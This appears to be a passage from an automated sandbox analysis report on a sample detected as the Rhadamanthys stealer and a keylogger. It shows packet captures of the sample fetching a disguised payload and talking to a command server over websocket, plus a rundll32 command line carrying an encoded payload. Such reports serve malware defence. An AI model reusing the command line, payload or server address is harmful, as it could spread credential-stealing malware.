                                                                Jan 23, 2023 21:39:53.846677065 CET8049701179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:53.848464966 CET8049701179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:53.848489046 CET8049701179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:53.848505020 CET8049701179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:53.850470066 CET8049701179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:53.903870106 CET4970180192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:55.842274904 CET4970180192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:55.898617029 CET8049701179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:55.898905039 CET4970180192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:55.914685965 CET8049701179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:55.961297035 CET8049701179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:55.961373091 CET8049701179.43.163.126192.168.2.5
                                                                Jan 23, 2023 21:39:55.961605072 CET4970180192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:55.961992979 CET4970180192.168.2.5179.43.163.126
                                                                Jan 23, 2023 21:39:55.977725983 CET8049701179.43.163.126192.168.2.5

                                                                HTTP Request Dependency Graph

                                                                • 179.43.163.126

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.549700179.43.163.12680C:\Users\user\Desktop\MqE1p1WFrf.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 23, 2023 21:39:35.266442060 CET0OUTGET /datalib/vldfce.hrgh HTTP/1.1
                                                                Host: 179.43.163.126
                                                                User-Agent: curl/5.9
                                                                Connection: close
                                                                X-CSRF-TOKEN: KctemQ4tKWXcCYgf3eHWQEL3RHmmcZPNFotyAWHFHmWP7xAC+WUy1RD6gjKEaUmg9yBshkxOpHoMyOgND4C/XQ==
                                                                Cookie: CSRF-TOKEN=KctemQ4tKWXcCYgf3eHWQEL3RHmmcZPNFotyAWHFHmWP7xAC+WUy1RD6gjKEaUmg9yBshkxOpHoMyOgND4C/XQ==; LANG=en-US
                                                                Jan 23, 2023 21:39:35.293557882 CET1INHTTP/1.1 200 OK
                                                                Content-Length: 929566
                                                                Content-Type: image/jpeg
                                                                Server: nginx/1.11.13
                                                                Date: Mon, 23 Jan 2023 20:39:35 GMT
                                                                Connection: close
                                                                Data Raw: ff d8 ff e0 00 88 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 1c 0c 0e 00 e2 00 9e d1 e8 f0 b2 bb af 1f 64 2a 78 43 45 95 78 c4 f1 cd 3d da 67 59 3b 06 70 2f d3 b0 8b 52 a0 44 8d b0 d9 c6 7e 24 ac bc 8a 1e c0 b3 15 0d de 85 98 7f d5 36 32 b5 09 c6 f2 49 26 30 4d 6f 36 81 03 c1 fe e8 56 e9 18 be d2 68 bc 9e 31 4a 2d f4 33 cf 82 af c5 5e f5 ab db 54 30 3b dd f7 63 de 8c 44 1d 86 bf 6b c1 7d dd 40 06 fb fa c3 9a 7f 95 40 ff db 00 84 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0b 0b 09 0c 11 0f 12 12 11 0f 11 11 13 16 1c 17 13 14 1a 15 11 11 18 21 18 1a 1d 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 78 00 5f 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f9 f3 c6 73 35 ae a7 6b 15 b3 45 be 5b 28 18 18 a3 1e 59 3e 5a 8c a8 c7 03 8e 07 a5 7c e6 12 11 ab 09 39 6c 9b df 7f 99 f6 53 9c a9 c9 53 5b db a6 dd 4c 83 a9 df 26 63 32 2f 98 b8 c8 d8 80 73 8f 6e 7a d7 4f d5 a9 3d 6d a7 cf fc cc fe b1 59 7b ad eb fd 79 0e 9b 52 bf 74 6f de ca 30 73 ce df 5e 47 4c 62 94 70 d4 ae b4 fc ff 00 cc d2 75 aa 72 dd 5d 7f 5e 85 d8 b5 3b 6b b2 1d 60 b5 8d 06 0b 87 de 01 cb 80 40 c1 27 80 7f 10 0f 42 3e 6c 5e 1e 54 f4 bb 6f e5 db e5 bf e7 e4 f4 eb 86 22 95 55 cc 92 4b ad f9 ba bf 56 f4 fc 55 f6 6a d2 b9 fd a6 64 b5 fb 3c 4a f1 36 04 68 63 6c ec 7e 42 80 79 52 32 ad f5 00 e0 f4 35 87 d5 92 9f 33 d7 af af e4 fa af 9f 4d cd d5 48 54 87 24 6e 9e d7 5a d9 ea 92 ea b7 4f d5 26 d3 d9 8c d4 2e 64 41 24 b7 4d 2d a4 2a e5 21 22 e2 36 32 15 03 70 3b 80 23 a8 39 c6 09 24 0e 95 74 a8 a7 6e 45 77 d7 47 a7 f5 ea 45 69 46 9d dd 57 ca 96 8b de 8b bb 4b 5d ed 6f bb bd b6 16 ca ea 39 e5 8e 16 7b eb 79 a4 66 54 8f e4 03 e5 07 76 e1 8c 82 31 c8 e9 93 db a0 2a 51 e5 4d d9 34 bd 7a fe 01 87 9c 2a ca 31 bb 4e 57 b6 dd 13 df aa db ef ec 47 a8 de a4 50 42 b1 cd 2c 89 3e f1 f2 b0 c3 a8 c0 f4 3d 4e ef 40 3e 6e bc 13 54 f0 f7 6d b5 6b 5b fa fe bc bc c5 5e b5 38 a8 f2 b6 d4 af db 54 ad e4 f7 d7 d3 5d f4 6f 31 26 31 08
                                                                Data Ascii: JFIFd*xCEx=gY;p/RD~$62I&0Mo6Vh1J-3^T0;cDk}@@!"$"$x_}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?s5kE[(Y>Z|9lSS[L&c2/snzO=mY{yRto0s^GLbpur]^;k`@'B>l^To"UKVUjd<J6hcl~ByR253MHT$nZO&.dA$M-*!"62p;#9$tnEwGEiFWK]o9{yfTv1*QM4z*1NWGPB,>=N@>nTmk[^8T]o1&1
                                                                Jan 23, 2023 21:39:35.293618917 CET3INData Raw: c1 0e 1c b6 02 87 4f 9b d3 39 5c 0f af f2 eb 5d 0e 9a 77 7f e7 fe 67 22 6a 36 4d 3b bf 35 af e1 64 0b a9 4c 8e 41 59 92 48 fe 67 20 0c 05 c8 03 23 6f a9 1f 9e 3b e2 87 86 83 5e 4f fa ee 67 f5 8e 47 cb 2b dd 6f e9 f7 15 64 d4 af 27 82 3f 28 a2 f2
                                                                Data Ascii: O9\]wg"j6M;5dLAYHg #o;^OgG+od'?(N*a`j=>Ik2+ SuMBj?RJJe=<MWS?t"^dK1hP"0m.s]nmJoJ\r[/dsIN%
                                                                Jan 23, 2023 21:39:35.293662071 CET4INData Raw: ec 9e 97 df bf 53 33 ed 56 f6 77 b6 3f 69 54 71 73 74 18 ab 06 24 db 89 3a b1 6e b9 e5 7e 8a 73 ef d1 cb 29 42 7c bd 17 e3 6e 9f 9f cc f3 e5 5a 9d 2a d4 94 f5 e6 96 df dc e6 dd df ab db d1 16 3e 27 db 58 db f8 f6 e6 5b 3b 78 e3 b6 95 f7 22 28 c2
                                                                Data Ascii: S3Vw?iTqst$:n~s)B|nZ*>'X[;x"(+Ns=PgxH&i7-:n{vi<aEWhz&u9/?wzX6WjBap =WZW:xwxPh
                                                                Jan 23, 2023 21:39:35.293699980 CET4INData Raw: 11 cb 61 4f 2b d4 1f 41 d4 d6 35 a9 d3 55 dc d3 ff 00 87 bf df fd 5f 63 a3 07 88 af f5 45 46 71 e9 a7 9a b6 8b a2 f9 df e4 d9 c6 5c 07 86 f5 e2 9a 32 ff 00 30 de bb c1 cf af 23 ae 7d 47 ad 7a d1 b3 8a 68 f0 6a 37 09 b5 25 73 d8 7e 1b c9 63 a1 f8
                                                                Data Ascii: aO+A5U_cEFq\20#}Gzhj7%s~c~{V%M8xGs0*z9qp5q3_K>xwmP*soZ_61v=m]#Kyx:Io=e)'}O:i30A%C2.*#r?_~
                                                                Jan 23, 2023 21:39:35.293745995 CET6INData Raw: 6b 67 25 2e 57 d7 9a 3f 9a 3c 2c 6c 1d 38 38 f4 e4 96 bd 1f a7 f5 7b de e7 4b ae 5b 0b 7d 71 ad a0 66 58 a0 d3 a0 e1 cf 3b 42 91 db 8e e3 a7 1c fa 66 b8 b0 d3 72 a5 cc fa c9 fd fa 1d 14 d7 ef 25 14 ed 68 af ba ed 7e bf d2 b9 53 50 b7 7d 1e c5 34
                                                                Data Ascii: kg%.W?<,l88{K[}qfX;Bfr%h~SP}4D=+[UWP);MX]JjZ</^9''z^7<F7q]^W<Q.+n)hVRW5Z4)FQOb
                                                                Jan 23, 2023 21:39:35.293790102 CET7INData Raw: 93 c8 0a 02 fc c7 03 03 9c 8f 4e 05 75 d0 76 e6 83 7d bf 53 9a b4 1c 95 3a a9 6a ee fc b4 b6 be 5d 8e 77 51 8e 21 ab 5a d9 c6 b9 36 e5 83 30 07 80 09 3c 93 df 3e c0 7f 33 d1 27 6a 52 7d cf 32 71 bd 78 47 b1 e8 bf 0e 2e 75 3d 26 16 5d 3c a6 37 7c
                                                                Data Ascii: Nuv}S:j]wQ!Z60<>3'jR}2qxG.u=&]<7|W)l=+1%yO>Ttz]7)u$) rOz,9xSG,-`XQ={SMGV*;?e}#, a>e${zVjkoX{][_Mo-S
                                                                Jan 23, 2023 21:39:35.293836117 CET8INData Raw: 2b 1d b8 6a 15 26 a1 1e ef 53 c7 3c 1e 5b 5b f1 cf 99 76 f0 79 71 06 62 8f 93 90 a1 9b df fb aa 3b 72 c3 8e b5 be 32 3e c7 0b 68 6e ce 7c 35 77 5f 1b fb cd b6 f3 eb e7 d3 4e de 9b 8e d7 26 f3 fe 21 ad f4 57 11 db 8b 7b 88 a4 13 3e 76 f9 9b d4 1e
                                                                Data Ascii: +j&S<[[vyqb;r2>hn|5w_N&!W{>vzC8>W.?Dvztny]6W[M/vF5e$_9Ckt31YfFpr{5%O~fZ)XSO8Mky!a>RU@_~FG
                                                                Jan 23, 2023 21:39:35.293880939 CET10INData Raw: 23 9f 2d c0 ca 7c d8 e9 69 6b e9 df fc f6 d3 a2 d0 6e b7 6f 1b 69 d3 ea 03 01 ae 2c ee 48 50 f9 0b fb b6 62 a0 12 48 1c fe bd 4f 65 42 6d 54 54 fb 4a 3f 9a 5e 87 16 73 4a 3f 57 75 57 58 bf c9 b3 63 57 c4 7e 30 92 15 5d e3 ec b0 17 3c 0c f0 79 c5
                                                                Data Ascii: #-|iknoi,HPbHOeBmTTJ?^sJ?WuWXcW~0]<yN_)[/GqqesJ!c?UV]1~>W%w=Z|(axfX;2%SF}aeu>#m=5RN"PcNy$a)wJj;u,
                                                                Jan 23, 2023 21:39:35.293926001 CET11INData Raw: 56 7f 10 33 be b8 19 e0 36 32 16 9c 59 70 4b 13 26 24 cf 90 ec a4 dd b6 cc e8 b0 7e 9b f6 2d cb 24 b5 b4 e5 a8 82 42 61 fb bf b2 9a 58 7f ea f6 7c ab 65 a6 c9 5c 77 8a 0b 22 ba 8f a2 de fe 75 cc 93 61 22 5f f6 6f 99 26 a1 c8 bd 45 3c 7a 42 6b 85
                                                                Data Ascii: V362YpK&$~-$BaX|e\w"ua"_o&E<zBkk;-eU!W(UZw_e4"yH(` A[-DpfGGY!3c#+z]$#3H||lQDfUTjQ8T=X2"ZC!O
                                                                Jan 23, 2023 21:39:35.293972969 CET12INData Raw: 51 f3 4d 49 4a fa c2 bc 32 f0 03 8c f6 89 52 30 30 af 11 81 88 11 63 f4 63 a6 ee 99 ef 45 fc 9d ed a9 3d 5c d5 41 08 b5 3c 23 cc 81 d1 50 f9 d9 ef fe ac 86 18 75 71 b2 74 0a 0d 95 34 8d 74 82 37 2a b9 ee 13 61 6e f0 f0 34 4a 27 25 5d e1 c5 8d 73
                                                                Data Ascii: QMIJ2R00ccE=\A<#Puqt4t7*an4J'%]sY{=Pvji4*CJzBb_goX}/X.=fgIGwd'r.}FSh_IRIO*8'(eF(bWUdRIcw
                                                                Jan 23, 2023 21:39:35.309982061 CET14INData Raw: 15 bb db 3e bb 1e aa 60 80 50 59 c2 21 19 58 1d 78 f8 3d 20 5f dc a3 ec 68 83 0f 8f 80 4a 37 8b 13 a7 02 1b 8b 53 82 1f 43 7f f1 83 54 79 9d 2c 57 37 f0 12 2d cc df f3 ae c7 63 c2 5c 88 a3 c7 00 70 e9 26 51 b7 a9 ad 7c 47 f2 66 62 c9 10 cc a5 3e
                                                                Data Ascii: >`PY!Xx= _hJ7SCTy,W7-c\p&Q|Gfb>xu6e|O|k26LC8[-iuKg@M.P$Tixc8Y,\YizHGvN5rp_i=b2z*'>QOt?]ySx|obd


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.549701179.43.163.12680C:\Users\user\Desktop\MqE1p1WFrf.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 23, 2023 21:39:53.428050041 CET969OUTGET /datalib/vldfce.hrgh HTTP/1.1
                                                                Host: 179.43.163.126
                                                                User-Agent: curl/5.9
                                                                Upgrade: websocket
                                                                Connection: upgrade
                                                                Sec-Websocket-Version: 13
                                                                Sec-Websocket-Key: 5p53O3OKTa7Wme0
                                                                Jan 23, 2023 21:39:53.443875074 CET969INHTTP/1.1 101 Switching Protocols
                                                                Upgrade: websocket
                                                                Connection: Upgrade
                                                                Sec-WebSocket-Accept: Zzt3XkR9BPLhCGYXSGrnEQhOGGw=
                                                                Jan 23, 2023 21:39:53.447817087 CET969OUTData Raw: 82 fe 00 8a d3 2c f1 e5
                                                                Data Ascii: ,
                                                                Jan 23, 2023 21:39:53.503725052 CET970OUTData Raw: ce 4e 92 e3 2c 71 e5 03 72 42 a1 d8 d3 2c f1 e5 e7 46 20 f0 1c 96 c4 05 f0 40 3c 5e a4 5a 3e b3 90 df c7 bf b0 e2 ba 1b 39 8d 4a ef 24 9c 1b fa dd d6 de aa 19 ef 1a d1 85 e8 02 55 fb 29 c2 d1 b7 aa bd 24 d2 67 e1 04 ea 7a 5c c9 ea 5d 02 43 3a bf
                                                                Data Ascii: N,qrB,F @<^Z>9J$U)$gz\]C:Dr~*@-q,!Y(;"NdZ6|ioq>
                                                                Jan 23, 2023 21:39:53.522943974 CET970INData Raw: 82 60 ef 37 87 70 ea 8b 95 15 3f 10 c4 bd ed ac 9e 25 9d 36 78 54 5e e4 aa 31 d2 1d ef 0d 16 09 bf 5c 36 f5 7c ff fb 3f f2 f6 31 c7 48 35 ed d8 55 55 b3 ac 00 7e 39 d1 3c 97 a3 40 d8 9a 58 be 82 b8 95 96 63 37 10 c2 e1 37 b2 fc c5 b9 79 51 c4 86
                                                                Data Ascii: `7p?%6xT^1\6|?1H5UU~9<@Xc77yQm4K
                                                                Jan 23, 2023 21:39:53.526966095 CET970OUTData Raw: 82 88 33 f7 0d 59
                                                                Data Ascii: 3Y
                                                                Jan 23, 2023 21:39:53.587609053 CET970OUTData Raw: a6 74 bc 9a ee 1e ce 98
                                                                Data Ascii: t
                                                                Jan 23, 2023 21:39:53.605664015 CET971INData Raw: 82 7e 03 0f 59 e0 30 3a e9 74 58 d2 14 c6 d2 1c 1c a8 6a aa c8 72 48 a5 3e f0 19 26 8a 19 ec e0 79 ce bc f6 38 54 9b bf d4 7a 92 6e 72 1f 26 4b f0 da 8c 6b 40 5c 56 69 aa e1 26 1a c8 b4 ca 26 fc 15 ad 06 e4 87 30 77 c7 82 65 2c 85 03 b4 85 c4 fb
                                                                Data Ascii: ~Y0:tXjrH>&y8Tznr&Kk@\Vi&&0we,,@hzqhC#!WIm}Y,>(,D\DW;w"8qoP@g&]E\R`gCJa)E|[:~18}Erl]&7
                                                                Jan 23, 2023 21:39:53.797132969 CET971OUTData Raw: 82 d8 59 01 c2 ff
                                                                Data Ascii: Y
                                                                Jan 23, 2023 21:39:53.797297955 CET975OUTData Raw: 32 29 20 ad 45 3a d8 ed 61 c7 13 c7 2c 55 09 ed 47 84 bc 76 20 91 ad cb ee d5 03 ab bb a9 fc 22 c2 3f 43 76 3d d8 45 ed 62 47 35 b9 06 4c 98 60 94 fa 77 2b 2f 6c dd d5 7e ad 3c b1 c7 5a f7 25 16 ef 2d 71 96 0a ac 90 2a ed 45 4c e3 3d 38 17 98 52
                                                                Data Ascii: 2) E:a,UGv "?Cv=EbG5L`w+/l~<Z%-q*EL=8R[D= bQ]8&QJ!*r-UB-\V,eq"[vfN6c1RwZ4wI~6hSm~S;u%C%XkI)QcD`CZg
                                                                Jan 23, 2023 21:39:53.797385931 CET979OUTData Raw: 1b 8e d4 8c 78 b6 9a cf 21 3b 83 13 3b 9c 05 87 06 9e 68 0c a6 94 5d f1 5b f0 74 80 00 83 65 f5 a8 1a 3f 30 37 47 b9 97 33 07 6c cb 6f ea d5 1c ca 91 be b0 dd 62 9a 31 69 8c e2 23 5b ca 43 36 94 85 5f 69 48 a3 91 dc 80 a4 e2 cb a4 04 b8 d6 7c 98
                                                                Data Ascii: x!;;h][te?07G3lob1i#[C6_iH|7D1Tt`#.[,V|<i*T7VeTUJOkyg`uyzWXjl|kVysV2s<qFud_'>lW0<Z)
                                                                Jan 23, 2023 21:39:53.797519922 CET983OUTData Raw: 82 fe 20 00 d1 61 ca f0 9d 5d e7 40 df a6 ad 34 1f d2 2d 24 f4 3a a3 79 c5 4f c2 cc 9f 3b e7 b7 be a2 7f dd ce 3b f1 2c a9 b7 ff 7d 38 99 34 06 a1 57 73 b4 f5 27 68 a5 14 fb c0 a8 9b 25 93 06 dd 95 61 cf 17 65 ac 57 cb 2c 7e 4d 57 d6 eb 67 ea e6
                                                                Data Ascii: a]@4-$:yO;;,}84Ws'h%aeW,~MWgZu&LK#j`%gDwjxqD>_5)LZHnR^ug.zJw`-^1k[hX$8dY; ;x4Km oX $FJ8 hDDN\3
                                                                Jan 23, 2023 21:39:53.813359976 CET992OUTData Raw: b5 85 dd cc 8b 24 ef 89 18 ed 68 ce ca 88 24 aa 58 5b b7 15 58 28 d0 e4 eb cc af be 14 60 63 3c a5 85 d8 6e ff 11 8e b2 ec f8 58 c3 44 8d ad ff 0c 08 10 27 50 be af ae 54 67 9f 62 07 17 a5 fa 60 ae 01 e2 7b 92 fa e8 7c b4 7b 38 15 bf 85 ab 7d d7
                                                                Data Ascii: $h$X[X(`c<nXD'PTgb`{|{8})^QDqrW%]"b4li}9)SDR%vjw-%(k;q#tVgT,ezO>mC|-*#@k|kPJ3X._ooFyB""6bg}*/}
                                                                Jan 23, 2023 21:39:53.813359976 CET997OUTData Raw: 4d 27 24 7b 47 99 ce dc d6 f0 fa ce 39 15 b6 b7 99 59 a1 87 2e ac 7b 65 81 52 1e 5c ce 05 74 f5 ce 4b 99 d9 00 a5 b8 ff 34 0b df d8 3a 0b 2e 9d 54 82 be f6 51 a9 d6 06 de 66 2c 28 3b 04 27 fd 3a 43 4f 78 20 6f f2 3c 6a be 8e 73 6b f5 7b 9c 3b ad
                                                                Data Ascii: M'${G9Y.{eR\tK4:.TQf,(;':COx o<jsk{;k'X]nN~`26[g9bh,4-NSztPVF2l}U3/po$2us6JFSD>=[GYUx]D}42zf:`vO]Jh^?J
                                                                Jan 23, 2023 21:39:53.850470066 CET1050INData Raw: 82 04 c7 e6 3d 5e
                                                                Data Ascii: =^
                                                                Jan 23, 2023 21:39:55.961297035 CET1050INData Raw: 82 24 0c 1a ea 61 ee b3 d2 cd b0 c7 94 58 9a 0f ee ba 84 bc 22 30 c5 7e 4f e0 ec 41 a8 23 5c 30 18 52 b2 8f 37 10
                                                                Data Ascii: $aX"0~OA#\0R7


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:1
                                                                Start time:21:39:11
                                                                Start date:23/01/2023
                                                                Path:C:\Users\user\Desktop\MqE1p1WFrf.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\MqE1p1WFrf.exe
                                                                Imagebase:0x400000
                                                                File size:204800 bytes
                                                                MD5 hash:DD10393642798DB29A624785EAD8ECEC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000003.307940010.000000000056E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000001.00000003.307940010.000000000056E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000003.310927358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.357859065.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000001.00000002.357859065.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low

                                                                General

                                                                Target ID:4
                                                                Start time:21:39:35
                                                                Start date:23/01/2023
                                                                Path:C:\Windows\System32\rundll32.exe
                                                                Wow64 process (32bit):false
                                                                Commandline: "C:\Users\user\AppData\Roaming\nsis_uns60877c.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8DW|AE8ANgBGOwBjrwAxAHYhAElJAEjvADAAWi0CWUiD|+wo6AQCAABI|4PEKMPMzMxM|4lEJBhIiVQkvxBIiUwkCF0BSP+LRCQwSIkEJPaBAThIbwAISMdE2yQQLQHrDoEBEEjXg8ABjwEQgQFASO05lgBzJZ8Diwwk|0gDyEiLwUiL9UyrAVR7AAPRSIt|yooJiAjrwWYFv2VIiwQlYPPwM||JSItQGEg70f90NkiDwiBIi|8CSDvCdCpmg|94SBh1GkyLQP9QZkGDOGt0B+4REUt1CBEQeBAu|3QFSIsA69VI64tI|QDBagBAU1X|VldBVEFVQVb7QVddAWaBOU1a|02L+EyL8kiL79kPhfzz8ExjSf88QYE8CVBFAO8AD4Xq8|BBi4T7CYjz8IXASI087wEPhNZqEYO8Cd2MLQEPhMfz8ESL|2cgRItfHIt3|yREi08YTAPh|0wD2UgD8TPJv0WFyQ+EpPPwTf+LxEGLEEUz0v9IA9OKAoTAdP8dQcHKDQ++wN76AAFEA9C|EXXs|0GB+qr8DXx0|w6DwQFJg8AE|0E7yXNp68aL|8EPtwxORYss|4tMA+t0WDPtvqoQdFFBixTBANP|M8mKAkyLwuu3D8HJyBEDyOUQAfdBigDVEO0zwDOf9kE7DLbgEKYAg||GAYP4CHLu6|8KSIvLQf|VSd+JBPeDxeQQxATfO28Ycq9mAUFf|0FeQV1BXF9e+11bMxdIgexgAf5kAIvp6Gb+||+|SIXAD4SYdSBM9Y2vAYsrEMgz|+j9m30gjV8ETI1F|0Yz0ovL|1Qk|WiAIEyL4A+Ea3p1IEWoEDPAi9ORIF9IiXwkIKYgcIAgP0iL8A+ES3UgpiD|UEiNVghEjUffQEiNjCSFEUiL79jofP1+II1WSGreIBDiIczz8Ohn7yA|RIsGjVcIQSCmIL1YyiGJhCSAhxLe9vPwiw7aIFiJjCTYcREHMJEg6DHvIIuc|i0yTItdOkiD+|tsSIogMEyJZCTvOEyLpBoyTIlcboQBhCTchxGGko0Ru41HSzCMJPDz8Enfi9To6fwFMIqc7ngySI2EeDJBgPN|IY1PbEQwGKQCf4PpAXXzgbx4Mv8hUmV4dU2LhLsk9CIxlCT4NQHC|0g72HI4g|psv3YzRI1JQPoAlKdBuACYAKYgQMoi+Od0GUS2MMAxSY1U+yRskSBJg+hs6N1rgjBIi86mIHhI|4X|dBKLVUJM|I4wGzFIjUwkQP8P10iBxHQhYSQtCC0B
                                                                Imagebase:0x7ff676650000
                                                                File size:69632 bytes
                                                                MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000004.00000003.353314399.0000017ED8C6D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000004.00000003.353657620.0000017ED8E6D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000004.00000003.406415950.0000017ED8D42000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000004.00000003.384266045.0000017ED94B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000004.00000003.383899245.0000017ED92B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000003.359030553.0000017ED8C69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000003.359569400.0000017ED8EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high

                                                                General

                                                                Target ID:9
                                                                Start time:21:40:02
                                                                Start date:23/01/2023
                                                                Path:C:\Windows\System32\WerFault.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 3352 -s 648
                                                                Imagebase:0x7ff72ac60000
                                                                File size:494488 bytes
                                                                MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:9.4%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:11.3%
                                                                  Total number of Nodes:582
                                                                  Total number of Limit Nodes:28
